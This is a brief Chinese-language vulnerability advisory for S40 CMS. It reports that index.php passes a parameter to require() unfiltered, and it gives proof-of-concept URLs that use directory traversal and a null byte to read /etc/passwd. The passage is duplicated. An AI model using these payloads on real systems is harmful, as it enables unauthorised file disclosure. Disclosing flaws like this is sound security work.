S40 CMS是一套免费的内容管理系统。漏洞文件index.php
在获取变量之前没有正确地过滤通过require()的PHP函数。
PoC :
http://www.XXX.com/[cms_path]/?p=[local_file]%00
http://www.XXX.com/[cms_path]/?p=/../../../../../../../etc/passwd%00
在获取变量之前没有正确地过滤通过require()的PHP函数。
PoC :
http://www.XXX.com/[cms_path]/?p=[local_file]%00
http://www.XXX.com/[cms_path]/?p=/../../../../../../../etc/passwd%00